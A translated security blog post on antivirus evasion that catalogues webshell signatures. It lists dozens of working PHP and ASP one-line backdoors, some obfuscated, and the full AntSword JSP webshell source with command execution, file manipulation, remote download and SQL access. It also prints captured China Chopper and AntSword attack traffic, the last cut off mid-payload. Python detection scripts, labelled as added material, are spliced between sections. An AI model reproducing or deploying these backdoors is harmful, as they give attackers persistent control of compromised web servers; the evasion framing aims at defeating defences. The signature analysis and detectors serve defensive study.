AV Evasion Basics: Signature Analysis of Common Webshells

admin | April 13, 2022, 20:06:25 | Security articles


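As mentioned earlier, antivirus software detects trojans by matching signatures. Before attempting evasion, we therefore need to analyze the signatures of the trojans we commonly use. Only by understanding these signatures can we hide them and thereby achieve evasion.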

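Introduction to webshells

A webshell is a script-based attack tool used in web intrusions.

Put simply, a webshell is an ASP or PHP trojan backdoor. After compromising a website, an attacker typically places these ASP or PHP backdoor files in the web directory of the site's server, mixed in with the normal page files. The attacker can then control the web server through the backdoor over the web, including uploading and downloading files, viewing databases, and executing arbitrary programs and commands.

The most common one-line trojans

PHP one-line trojans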


<?php eval(@$_POST['a']);?>
<?php assert(@$_POST['a']);?>
<?php $fun = create_function('',$_POST['a']);$fun();?>
<?php @call_user_func(assert,$_POST['a']);?>
<?php @preg_replace("/abcde/e", $_POST['a'], "abcdefg");?>
<?php $test='<?php $a=$_POST["cmd"];assert($a); ?>';file_put_contents("Trojan.php", $test);?>

ASP one-line trojans

<%eval request("chopper")%>
<%execute request("chopper")%>
<%execute(request("chopper"))%>
<%ExecuteGlobal request("chopper")%>
<%Eval(Request(chr(35)))%>
<%dy=request("c")%><%Eval(dy)%>
<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>
<% if Request("c")<>"" then ExecuteGlobal request("c") end if %>
<%execute request("c")%><%'<% loop <%:%>
< %'<% loop <%:%><%execute request("a")%>
<script language=vbs runat=server>eval(request("c"))</script>
<script language=VBScript runat=server>execute request("#")</script>
<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%>
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
<%execute(unescape("eval%20request%28%22aaa%22%29"))%>

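China Chopper (中国菜刀)

China Chopper has gone through several versions since its release, and its functionality and stealth have improved considerably along the way. Three versions are in mainstream use today: 2011, 2014 and 2016. The step from 2011 to 2014 enhanced functionality, and the step from 2014 to 2016 enhanced stealth: the 2016 version adds obfuscation to Chopper's traffic, making its connection traffic harder to recognize.

China Chopper supports connecting to PHP, JSP and ASP webshells. The traffic for these three languages differs, and it also differs between versions.

China Chopper's traffic signatures are very distinctive, and practically all current security devices can identify Chopper traffic. Today Chopper is used mostly for security teaching and is rarely used in real engagements.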


Chopper webshell static signatures

Chopper uses one-line trojans as its webshell, and their signatures are very obvious.

Common one-liners (eval):

PHP

<?php @eval($_POST['caidao']);?>

ASP:

<%eval request("caidao")%>

ASP.NET

<%@ Page Language="Jscript"%><%eval(Request.Item["caidao"],"unsafe");%>

Chopper webshell dynamic signatures

Here we analyze a request captured on a local test machine.

POST /1.php HTTP/1.1
X-Forwarded-For: 0.200.191.153
Referer: http://localhost/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Host: localhost
Content-Length: 423
Cache-Control: no-cache
Connection: close

test=array_map("ass"."ert",array("ev"."Al("\$xx%3D\"Ba"."SE6"."4_dEc"."OdE\";@

ev"."al(\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZ

ihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEYJ0Q6XFxwaHBzdHVkeV9wcm9cXFdXV1xcMS5waHAnOyRQPUBmb3BlbigkRiwncicpO2VjaG8oQGZyZWFkKCRQLGZpbGVzaXplKCRGKSkpO0BmY2xvc2UoJFApOztlY2hvKCJYQFkiKTtkaWUoKTs%3D'));");"));

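Signatures:

  1. The User-Agent is that of the Baidu crawler

  2. The request body contains signature strings such as eval and base64

  3. The payload passed in the request body is base64-encoded and contains the fixed string QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J

  4. The execution result is returned in the response as plaintext, in the format

X@Y
result
X@Y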




  5. The request payload can be decoded with base64
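The signatures listed above can be checked mechanically on captured traffic. The following Python code is an added example, not part of the original post: it undoes the `"ev"."Al"` style literal splitting seen in the capture, decodes the base64 payload and reports each signature. The function names and the lab request are constructed for illustration.

```python
import base64
import re
from urllib.parse import unquote

# Start of the plaintext that the fixed base64 string in signature 3 decodes to.
CHOPPER_PROLOGUE = '@ini_set("display_errors","0");@set_time_limit(0);'
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Adjacent PHP string literals joined with the dot operator, e.g. "ev"."Al"
CONCAT = re.compile(r"""(["'])\s*\.\s*\1""")
KEYWORDS = ("eval(", "assert", "base64_decode")


def normalise(body: str) -> str:
    """URL-decode the body and rejoin keywords split across string literals."""
    return CONCAT.sub("", unquote(body))


def decode_payloads(text: str) -> list[str]:
    """Decode every long base64 run that turns out to be valid UTF-8 text."""
    decoded = []
    for run in B64_RUN.findall(text):
        try:
            raw = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
            decoded.append(raw.decode("utf-8"))
        except ValueError:  # bad base64 or not text: ignore this run
            continue
    return decoded


def triage(user_agent: str, body: str, response: str = "") -> dict:
    """Report the Chopper traffic signatures found in one request/response."""
    text = normalise(body)
    lowered = text.lower()
    payloads = decode_payloads(text)
    wrapped = re.search(r"X@Y(.*?)X@Y", response, re.S)
    return {
        "spoofed_baidu_ua": "baiduspider" in user_agent.lower(),
        "keywords": sorted(k for k in KEYWORDS if k in lowered),
        "fixed_prologue": any(p.startswith(CHOPPER_PROLOGUE) for p in payloads),
        "decoded": payloads,
        "result": wrapped.group(1) if wrapped else None,
    }


def sample_exchange() -> tuple[str, str, str]:
    """Constructed lab exchange shaped like the capture above; the payload only echoes."""
    php = CHOPPER_PROLOGUE + 'echo("X@Y");echo("lab");echo("X@Y");die();'
    b64 = base64.b64encode(php.encode()).decode().replace("=", "%3D")
    body = (
        r"""test=array_map("ass"."ert",array("ev"."Al(\"\$xx%3D\"Ba"."SE6"."4_dEc"."OdE\";@ev"."al(\$xx('"""
        + b64
        + r"""'));\");"));"""
    )
    ua = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
    return ua, body, "X@Y" + "lab" + "X@Y"


if __name__ == "__main__":
    for key, value in triage(*sample_exchange()).items():
        print(f"{key}: {value}")
```

A genuine Baidu crawler does not POST form data, so the User-Agent check is most useful in combination with the other three results rather than on its own.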



AntSword

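AntSword (蚁剑) is an open-source, cross-platform website management tool, intended mainly for penetration testers, security researchers with permission or authorization, and website administrators. Much of AntSword's code derives from China Chopper, so its connection traffic closely resembles Chopper's. AntSword is highly extensible, however, and its traffic can be encrypted, obfuscated and otherwise processed to bypass detection. By default AntSword supports connecting to ASP and PHP webshells.

AntSword webshell static signatures

The AntSword project provides ready-made backdoor scripts, each of which has been "mutated" to a different degree. AntSword's core code was adapted from Chopper, so ordinary one-line trojans also work with it.

PHP trojan signatures

Execution through assert or eval

ASP trojan signatures

Use of eval

JSP trojan signatures

Use of Java class loading (ClassLoader), together with character signatures such as base64 encoding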

<?php
/**
 * -----------------------------------------------
 * AntSword PHP assert Script
 *
 * Warning:
 * This script is provided only for lawful penetration testing and for enthusiasts to study.
 * Do not use it for illegal purposes; anyone who does will be held responsible!
 * -----------------------------------------------
 * pwd=ant
 */
$ant=base64_decode("YXNzZXJ0");
$ant($_POST['ant']);
?>

<!--
/**
 * -----------------------------------------------
 * AntSword ASP eval xxxx Script
 *
 * Warning:
 * This script is provided only for lawful penetration testing and for enthusiasts to study.
 * Do not use it for illegal purposes; anyone who does will be held responsible!
 * -----------------------------------------------
 *
 * Password: ant
 *
 * This script must be used together with the asp xxxxdog encoder
-->
<%
Function xxxx(str)
    eval str
End Function
%>
<%D = request("ant")%>
<%xxxx D%>

<%--
-----------------------------------------------
 AntSword JSP Custom Script for Mysql
 Warning:
 This script is provided only for lawful penetration testing and for enthusiasts to study.
 Do not use it for illegal purposes; anyone who does will be held responsible!
-----------------------------------------------
Notes:
 1. AntSword >= v2.1.0
 2. Select the custom mode when creating the Shell
 3. Database connection:
    com.mysql.jdbc.Driver
    jdbc:mysql://localhost/test?user=root&password=123456
    Note: the above is two lines
 4. The encoder/decoder in this script must match the encoder/decoder selected when adding the Shell in AntSword; if default is selected, the value must be set to empty
Known issues:
 1. File management has a display problem with Chinese file names
ChangeLog:
 v1.9
  1. Fixed garbled output caused by the decode function and the EC function being called in the wrong order
 v1.8
  1. Fixed the loss of the leading 0 of 0A during hex decoding
 v1.7
  1. Added AES encoding/decoding support (thx @Ch1ngg)
  2. Added Version: accessing the script directly without any parameters returns the current shell version
 v1.6
  1. Added support for 4 decoders
 v1.5
  1. Fixed the characterEncoding error when connecting to a database with the base64 encoder
 v1.4
  1. Fixed the drive letter of the base path being returned in lower case on Windows
 v1.3
  1. Fixed a bug when uploading files larger than 1M
  2. Fixed path detection for weblogic war deployments
  3. Fixed a problem with Chinese characters in files
 Date: 2016/04/29 v1.2
  1. Fixed a bug when modifying files that contain the closing tag
 Date: 2016/04/06 v1.1
  1. Fixed a wrong parameter setting for file download
  2. Fixed some details in the comments
 Date: 2016/03/26 v1
  1. File system and terminal management
  2. mysql database support
  3. Support for base64 and hex encoding
--%>
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,javax.crypto.*,java.security.*,javax.crypto.spec.*" contentType="text/html;charset=UTF-8"%>
<%!
// #################################################################
String Pwd = "ant"; // connection password
// Encoder
String encoder = ""; // default (plaintext)
// String encoder = "base64"; // base64
// String encoder = "hex"; // hex (recommended)
// String encoder = "aes"; // aes (see the aes configuration below)
// Decoder
String decoder = ""; // default (plaintext)
// String decoder = "base64"; // base64, Chinese text is handled correctly
// String decoder = "hex"; // hex, Chinese text may have problems
// String decoder = "hex_base64"; // hex(base64), Chinese text is handled correctly
// String decoder = "aes_base64"; // aes(base64) (see the aes configuration below)
// Other settings
String cs = "UTF-8"; // character set
String SessionKey = "CUSTOMSESSID"; // custom session key id
String RetS = "LT58"; // data start delimiter, base64
String RetE = "fDwt"; // data end delimiter, base64
// aes encryption settings
/*
 * aes-128-cfb_zero_padding:
 * - aes_mode: CFB
 * - aes_padding: NoPadding
 * - aes_keylen: 16
 * aes-256-ecb_zero_padding:
 * - aes_mode: ECB
 * - aes_padding: NoPadding
 * - aes_keylen: 32
 */
// Note: the following 4 settings are shared by the encoder and decoder
// To use different methods for the request and the response, modify them yourself
String aes_mode = "CFB"; // CBC|ECB|CFB|
String aes_padding = "NoPadding"; // NoPadding|PKCS5Padding|PKCS7Padding
int aes_keylen = 16; // 16|32 // 16(AES-128) 32(AES-256)
String aes_key_padding = "a"; // padding character used when the obtained key is too short
// ################################################################
String AesKey = "";
String Version = "1.8";
String EC(String s) throws Exception { if(encoder.equals("hex") || encoder == "hex") return s; return new String(s.getBytes(), cs); }
String showDatabases(String encode, String conn) throws Exception { String sql = "show databases"; String columnsep = "t"; String rowsep = ""; return executeSQL(encode, conn, sql, columnsep, rowsep, false); }
String showTables(String encode, String conn, String dbname) throws Exception { String sql = "show tables from " + dbname; String columnsep = "t"; String rowsep = ""; return executeSQL(encode, conn, sql, columnsep, rowsep, false); }
String showColumns(String encode, String conn, String dbname, String table) throws Exception { String columnsep = "t"; String rowsep = ""; String sql = "select * from " + dbname + "." + table + " limit 0,0"; return executeSQL(encode, conn, sql, columnsep, rowsep, true); }
String query(String encode, String conn, String sql) throws Exception { String columnsep = "t|t"; String rowsep = "rn"; return executeSQL(encode, conn, sql, columnsep, rowsep, true); }
String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname) throws Exception { String ret = ""; conn = (EC(conn)); String[] x = conn.trim().replace("rn", "n").split("n"); Class.forName(x[0].trim()); String url = x[1] + "&characterEncoding=" +encode; Connection c = DriverManager.getConnection(url); Statement stmt = c.createStatement(); ResultSet rs = stmt.executeQuery(sql); ResultSetMetaData rsmd = rs.getMetaData();
if (needcoluname) { for (int i = 1; i <= rsmd.getColumnCount(); i++) { String columnName = rsmd.getColumnName(i); ret += columnName + columnsep; } ret += rowsep; }
while (rs.next()) { for (int i = 1; i <= rsmd.getColumnCount(); i++) { String columnValue = rs.getString(i); ret += columnValue + columnsep; } ret += rowsep; } return ret; }
String WwwRootPathCode(String d) throws Exception { String s = ""; if (!d.substring(0, 1).equals("/")) { File[] roots = File.listRoots(); for (int i = 0; i < roots.length; i++) { s += roots[i].toString().substring(0, 2) + ""; } } else { s += "/"; } return s; }
String FileTreeCode(String dirPath) throws Exception { File oF = new File(dirPath), l[] = oF.listFiles(); String s = "", sT, sQ, sF = ""; java.util.Date dt; String fileCode=(String)System.getProperties().get("file.encoding"); SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); for (int i = 0; i < l.length; i++) { dt = new java.util.Date(l[i].lastModified()); sT = fm.format(dt); sQ = l[i].canRead() ? "R" : ""; sQ += l[i].canWrite() ? " W" : ""; String nm = new String(l[i].getName().getBytes(fileCode), cs); if (l[i].isDirectory()) { s += nm + "/t" + sT + "t" + l[i].length() + "t" + sQ + "n"; } else { sF += nm + "t" + sT + "t" + l[i].length() + "t" + sQ + "n"; } } s += sF; return new String(s.getBytes(fileCode), cs); }
String ReadFileCode(String filePath) throws Exception { String l = "", s = ""; BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(filePath)), cs)); while ((l = br.readLine()) != null) { s += l + "rn"; } br.close(); return s; }
String WriteFileCode(String filePath, String fileContext) throws Exception { String h = "0123456789ABCDEF"; String fileHexContext = strtohexstr(fileContext); File f = new File(filePath); FileOutputStream os = new FileOutputStream(f); for (int i = 0; i < fileHexContext.length(); i += 2) { os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1)))); } os.close(); return "1"; }
String DeleteFileOrDirCode(String fileOrDirPath) throws Exception { File f = new File(fileOrDirPath); if (f.isDirectory()) { File x[] = f.listFiles(); for (int k = 0; k < x.length; k++) { if (!x[k].delete()) { DeleteFileOrDirCode(x[k].getPath()); } } } f.delete(); return "1"; }
void DownloadFileCode(String filePath, HttpServletResponse r) throws Exception { int n; byte[] b = new byte[512]; r.reset(); ServletOutputStream os = r.getOutputStream(); BufferedInputStream is = new BufferedInputStream(new FileInputStream(filePath)); os.write(("->"+"|").getBytes(), 0, 3); while ((n = is.read(b, 0, 512)) != -1) { os.write(b, 0, n); } os.write(("|"+"<-").getBytes(), 0, 3); os.close(); is.close(); }
String UploadFileCode(String savefilePath, String fileHexContext) throws Exception { String h = "0123456789ABCDEF"; File f = new File(savefilePath); f.createNewFile(); FileOutputStream os = new FileOutputStream(f,true); for (int i = 0; i < fileHexContext.length(); i += 2) { os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1)))); } os.close(); return "1"; }
String CopyFileOrDirCode(String sourceFilePath, String targetFilePath) throws Exception { File sf = new File(sourceFilePath), df = new File(targetFilePath); if (sf.isDirectory()) { if (!df.exists()) { df.mkdir(); } File z[] = sf.listFiles(); for (int j = 0; j < z.length; j++) { CopyFileOrDirCode(sourceFilePath + "/" + z[j].getName(), targetFilePath + "/" + z[j].getName()); } } else { FileInputStream is = new FileInputStream(sf); FileOutputStream os = new FileOutputStream(df); int n; byte[] b = new byte[1024]; while ((n = is.read(b, 0, 1024)) != -1) { os.write(b, 0, n); } is.close(); os.close(); } return "1"; }
String RenameFileOrDirCode(String oldName, String newName) throws Exception { File sf = new File(oldName), df = new File(newName); sf.renameTo(df); return "1"; }
String CreateDirCode(String dirPath) throws Exception { File f = new File(dirPath); f.mkdir(); return "1"; }
String ModifyFileOrDirTimeCode(String fileOrDirPath, String aTime) throws Exception { File f = new File(fileOrDirPath); SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); java.util.Date dt = fm.parse(aTime); f.setLastModified(dt.getTime()); return "1"; }
String WgetCode(String urlPath, String saveFilePath) throws Exception { URL u = new URL(urlPath); int n = 0; FileOutputStream os = new FileOutputStream(saveFilePath); HttpURLConnection h = (HttpURLConnection) u.openConnection(); InputStream is = h.getInputStream(); byte[] b = new byte[512]; while ((n = is.read(b)) != -1) { os.write(b, 0, n); } os.close(); is.close(); h.disconnect(); return "1"; }
String SysInfoCode(HttpServletRequest r) throws Exception { String d = ""; try { if(r.getSession().getServletContext().getRealPath("/") != null){ d = r.getSession().getServletContext().getRealPath("/"); }else{ String cd = this.getClass().getResource("/").getPath(); d = new File(cd).getParent(); } } catch (Exception e) { String cd = this.getClass().getResource("/").getPath(); d = new File(cd).getParent(); } d = String.valueOf(d.charAt(0)).toUpperCase() + d.substring(1); String serverInfo = (String)System.getProperty("os.name"); String separator = File.separator; String user = (String)System.getProperty("user.name"); String driverlist = WwwRootPathCode(d); return d + "t" + driverlist + "t" + serverInfo + "t" + user; }
boolean isWin() { String osname = (String)System.getProperty("os.name"); osname = osname.toLowerCase(); if (osname.startsWith("win")) return true; return false; }
String ExecuteCommandCode(String cmdPath, String command) throws Exception { StringBuffer sb = new StringBuffer(""); String[] c = { cmdPath, !isWin() ? "-c" : "/c", command }; Process p = Runtime.getRuntime().exec(c); CopyInputStream(p.getInputStream(), sb); CopyInputStream(p.getErrorStream(), sb); return sb.toString(); } String getEncoding(String str) { String encode[] = new String[]{ "UTF-8", "ISO-8859-1", "GB2312", "GBK", "GB18030", "Big5", "Unicode", "ASCII" }; for (int i = 0; i < encode.length; i++){ try { if (str.equals(new String(str.getBytes(encode[i]), encode[i]))) { return encode[i]; } } catch (Exception ex) { } } return ""; } String strtohexstr(String fileContext)throws Exception{ String h = "0123456789ABCDEF"; byte[] bytes = fileContext.getBytes(cs); StringBuilder sb = new StringBuilder(bytes.length * 2); for (int i = 0; i < bytes.length; i++) { sb.append(h.charAt((bytes[i] & 0xf0) >> 4)); sb.append(h.charAt((bytes[i] & 0x0f) >> 0)); } String fileHexContext = sb.toString(); return fileHexContext; }
String asenc(String str, String decode) throws Exception{ if(decode.equals("hex") || decode=="hex"){ return strtohexstr(str); }else if(decode.equals("base64") || decode == "base64"){ String sb = ""; sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder(); sb = encoder.encode(str.getBytes()); return sb; }else if(decode.equals("hex_base64") || decode == "hex_base64"){ return asenc(asenc(str, "base64"), "hex"); }else if(decode.equals("aes_base64") || decode == "aes_base64"){ String sb1 = ""; sb1 = AesEncrypt(AesKey, asenc(str, "base64")); return sb1.replace("rn",""); } return str; }
String decode(String str) { byte[] bt = null; try { sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder(); bt = decoder.decodeBuffer(str); } catch (IOException e) { e.printStackTrace(); } return new String(bt); } String decode(String str, String encode) throws Exception{ if(encode.equals("hex") || encode=="hex"){ if(str=="null"||str.equals("null")){ return ""; } String hexString = "0123456789ABCDEF"; str = str.toUpperCase(); ByteArrayOutputStream baos = new ByteArrayOutputStream(str.length()/2); String ss = ""; for (int i = 0; i < str.length(); i += 2){ ss = ss + (hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))) + ","; baos.write((hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1)))); } return baos.toString(cs); }else if(encode.equals("base64") || encode == "base64"){ byte[] bt = null; sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder(); bt = decoder.decodeBuffer(str); return new String(bt,cs); }else if(encode.equals("aes") || encode == "aes") { String str1 = AesDecrypt(AesKey, str); return str1.trim(); } return str; }
String AesEncrypt(String key, String cleartext) throws Exception { IvParameterSpec zeroIv = new IvParameterSpec(key.getBytes()); SecretKeySpec keys = new SecretKeySpec(key.getBytes(), "AES"); Cipher cipher = Cipher.getInstance(new String("AES/"+aes_mode+"/"+aes_padding)); cipher.init(Cipher.ENCRYPT_MODE, keys, zeroIv); byte[] encryptedData = cipher.doFinal(cleartext.getBytes("UTF-8")); sun.misc.BASE64Encoder encoder = new sun.misc.BASE64Encoder(); String sb = encoder.encode(encryptedData); return sb; }
String AesDecrypt(String key ,String encrypted) throws Exception { sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder(); byte[] byteMi = decoder.decodeBuffer(encrypted); IvParameterSpec zeroIv = new IvParameterSpec(key.getBytes()); SecretKeySpec keys = new SecretKeySpec(key.getBytes("UTF-8"), "AES"); Cipher cipher = Cipher.getInstance(new String("AES/"+aes_mode+"/"+aes_padding)); cipher.init(Cipher.DECRYPT_MODE, keys, zeroIv); byte[] decryptedData = cipher.doFinal(byteMi); return new String(decryptedData, "UTF-8"); }
String getKeyFromCookie(Cookie[] cookies){ String key = ""; StringBuilder result = new StringBuilder(); if( cookies != null ){ for (Cookie c : cookies) { if (c.getName().equals(SessionKey)) { key = c.getValue(); break; } } } if(key.length() < aes_keylen){ for(int i=0;key.length() < aes_keylen;i++){ key += aes_key_padding; } }if(key.length() > aes_keylen){ key = key.substring(0,aes_keylen); } return key; }
void CopyInputStream(InputStream is, StringBuffer sb) throws Exception { String l; BufferedReader br = new BufferedReader(new InputStreamReader(is, cs)); while ((l = br.readLine()) != null) { sb.append(l + "rn"); } br.close(); }%><% response.setContentType("text/html"); request.setCharacterEncoding(cs); response.setCharacterEncoding(cs); StringBuffer output = new StringBuffer(""); StringBuffer sb = new StringBuffer(""); Cookie cookie = new Cookie(SessionKey, session.getId()); response.addCookie(cookie); try { AesKey = getKeyFromCookie(request.getCookies()); String funccode = EC(request.getParameter(Pwd) + ""); String z0 = EC(decode(request.getParameter("z0")+"", encoder)); String z1 = EC(decode(request.getParameter("z1")+"", encoder)); String z2 = EC(decode(request.getParameter("z2")+"", encoder)); String z3 = EC(decode(request.getParameter("z3")+"", encoder)); String[] pars = { z0, z1, z2, z3}; output.append(decode(RetS,"base64"));
if (funccode.equals("B")) { sb.append(FileTreeCode(pars[1])); } else if (funccode.equals("C")) { sb.append(ReadFileCode(pars[1])); } else if (funccode.equals("D")) { sb.append(WriteFileCode(pars[1], pars[2])); } else if (funccode.equals("E")) { sb.append(DeleteFileOrDirCode(pars[1])); } else if (funccode.equals("F")) { DownloadFileCode(pars[1], response); } else if (funccode.equals("U")) { sb.append(UploadFileCode(pars[1], pars[2])); } else if (funccode.equals("H")) { sb.append(CopyFileOrDirCode(pars[1], pars[2])); } else if (funccode.equals("I")) { sb.append(RenameFileOrDirCode(pars[1], pars[2])); } else if (funccode.equals("J")) { sb.append(CreateDirCode(pars[1])); } else if (funccode.equals("K")) { sb.append(ModifyFileOrDirTimeCode(pars[1], pars[2])); } else if (funccode.equals("L")) { sb.append(WgetCode(pars[1], pars[2])); } else if (funccode.equals("M")) { sb.append(ExecuteCommandCode(pars[1], pars[2])); } else if (funccode.equals("N")) { sb.append(showDatabases(pars[0], pars[1])); } else if (funccode.equals("O")) { sb.append(showTables(pars[0], pars[1], pars[2])); } else if (funccode.equals("P")) { sb.append(showColumns(pars[0], pars[1], pars[2], pars[3])); } else if (funccode.equals("Q")) { sb.append(query(pars[0], pars[1], pars[2])); } else if (funccode.equals("A")) { sb.append(SysInfoCode(request)); }else{ sb.append(Version); } } catch (Exception e) { sb.append("ERROR" + ":// " + e.toString()); } try { output.append(asenc(sb.toString(), decoder)); }catch (Exception e) { sb.append("ERROR" + ":// " + e.toString()); } output.append(decode(RetE, "base64")); out.print(output.toString());%>
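Several of the one-line samples listed near the top of this page, and the AntSword PHP script above, hide the execution call behind chr() sequences, string concatenation, unescape() or base64_decode("YXNzZXJ0"), so a plain keyword match misses them. The following Python code is an added example, not from the original post or the AntSword project: it normalises those four tricks before looking for an execution sink that touches request input. The rule set and function names are assumptions chosen for illustration.

```python
import base64
import re
from urllib.parse import unquote

CHR = re.compile(r"chr\(\s*(\d{1,3})\s*\)", re.I)
JOIN = re.compile(r'"\s*[&+.]\s*"')  # "a"&"b", "a"+"b", "a"."b"
B64 = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)', re.I)
UNESCAPE = re.compile(r'unescape\(\s*"([^"]*)"\s*\)', re.I)
ASSIGN = re.compile(r'\$(\w+)\s*=\s*"(\w+)"\s*;')  # $f="assert";
SINK = re.compile(
    r"\b(eval|assert|executeglobal|execute|create_function|call_user_func)\b", re.I
)
INPUT = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b|\brequest\b", re.I)


def _b64(text: str) -> str:
    """Decode a base64 literal; keep the literal if it is not ASCII text."""
    try:
        return base64.b64decode(text, validate=True).decode("ascii")
    except ValueError:
        return text


def deobfuscate(src: str, max_rounds: int = 10) -> str:
    """Fold chr(), literal joins, base64/unescape literals and variable functions."""
    for _ in range(max_rounds):
        before = src
        src = CHR.sub(lambda m: '"%s"' % chr(int(m.group(1))), src)
        src = JOIN.sub("", src)
        src = B64.sub(lambda m: '"%s"' % _b64(m.group(1)), src)
        src = UNESCAPE.sub(lambda m: '"%s"' % unquote(m.group(1)), src)
        # $ant="assert"; $ant(...)  ->  assert(...)
        for name, value in ASSIGN.findall(src):
            src = re.sub(r"\$" + re.escape(name) + r"\s*\(", value + "(", src)
        if src == before:
            break
    return src


def classify(src: str) -> dict:
    """Flag scripts where an execution sink and request input occur together."""
    clear = deobfuscate(src)
    sinks = sorted({s.lower() for s in SINK.findall(clear)})
    reads_request = bool(INPUT.search(clear))
    visible = bool(SINK.search(src)) and bool(INPUT.search(src))
    suspicious = bool(sinks) and reads_request
    return {
        "deobfuscated": clear,
        "sinks": sinks,
        "suspicious": suspicious,
        # True when the pairing only shows up after normalisation
        "hidden": suspicious and not visible,
    }


# Samples quoted from the lists on this page, plus one constructed benign line.
CHR_ASP = '<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%>'
UNESCAPE_ASP = '<%execute(unescape("eval%20request%28%22aaa%22%29"))%>'
ANTSWORD_PHP = '''<?php $ant=base64_decode("YXNzZXJ0");$ant($_POST['ant']);?>'''
PLAIN_PHP = '''<?php @eval($_POST['caidao']);?>'''
BENIGN_PHP = '<?php echo htmlspecialchars($_GET["q"]); ?>'

if __name__ == "__main__":
    for sample in (CHR_ASP, UNESCAPE_ASP, ANTSWORD_PHP, PLAIN_PHP, BENIGN_PHP):
        print(classify(sample))
```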

AntSword webshell dynamic signatures

Here we analyze a captured traffic sample from a one-line webshell.

POST /1.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
User-Agent: Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11
Content-Type: application/x-www-form-urlencoded
Content-Length: 4564
Connection: close

a=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24oparr%3Dpreg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24opdir)%3B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24tmdir%3D%22.8ffc0%22%3B%40mkdir(%24tmdir)%3B%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%22..%22)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24oparr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24ocwd.%22%2F%22.%24tmdir)%3B%7D%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2239%22.%22344%22%3Becho%20%40asenc(%24output)%3Becho%20%22c0b7%22.%22944b7%22%3B%7Dob_start()%3Btry%7B%24p%3Dbase64_decode(substr(%24_POST%5B%22xd7cdb44e2a206%22%5D%2C2))%3B%24s%3Dbase64_decode(substr(%24_POST%5B%22j6a20c13d709ac%22%5D%2C2))%3B%24envstr%3D%40base64_decode(substr(%24_POST%5B%22icab0fb61b302a%22%5D%2C2))%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24c%3Dsubstr(%24d%2C0%2C1)%3D%3D%22%2F%22%3F%22-c%20%5C%22%7B%24s%7D%5C%22%22%3A%22%2Fc%20%5C%22%7B%24s%7D%5C%22%22%3Bif(substr(%24d%2C0%2C1)%3D%3D%22%2F%22)%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3A%2Fusr%2Flocal%2Fsbin%3A%2Fusr%2Flocal%2Fbin%3A%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin%22)%3B%7Delse%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3BC%3A%2FWindows%2Fsystem32%3BC%3A%2FWindows%2FSysWOW64%3BC%3A%2FWindows%3BC%3A%2FWindows%2FSystem32%2FWindowsPowerShell%2Fv1.0%2F%3B%22)%3B%7Dif(!empty(%24envstr))%7B%24envarr%3Dexplode(%22%7C%7C%7Casline%7C%7C%7C%22%2C%20%24envstr)%3Bforeach(%24envarr%20as%20%24v)%20%7Bif%20(!empty(%24v))%20%7B%40putenv(str_replace(%22%7C%7C%7Caskey%7C%7C%7C%22%2C%20%22%3D%22%2C%20%24v))%3B%7D%7D%7D%24r%3D%22%7B%24p%7D%20%7B%24c%7D%22%3Bfunction%20fe(%24f)%7B%24d%3Dexplode(%22%2C%22%2C%40ini_get(%22disable_functions%22))%3Bif(empty(%24d))%7B%24d%3Darray()%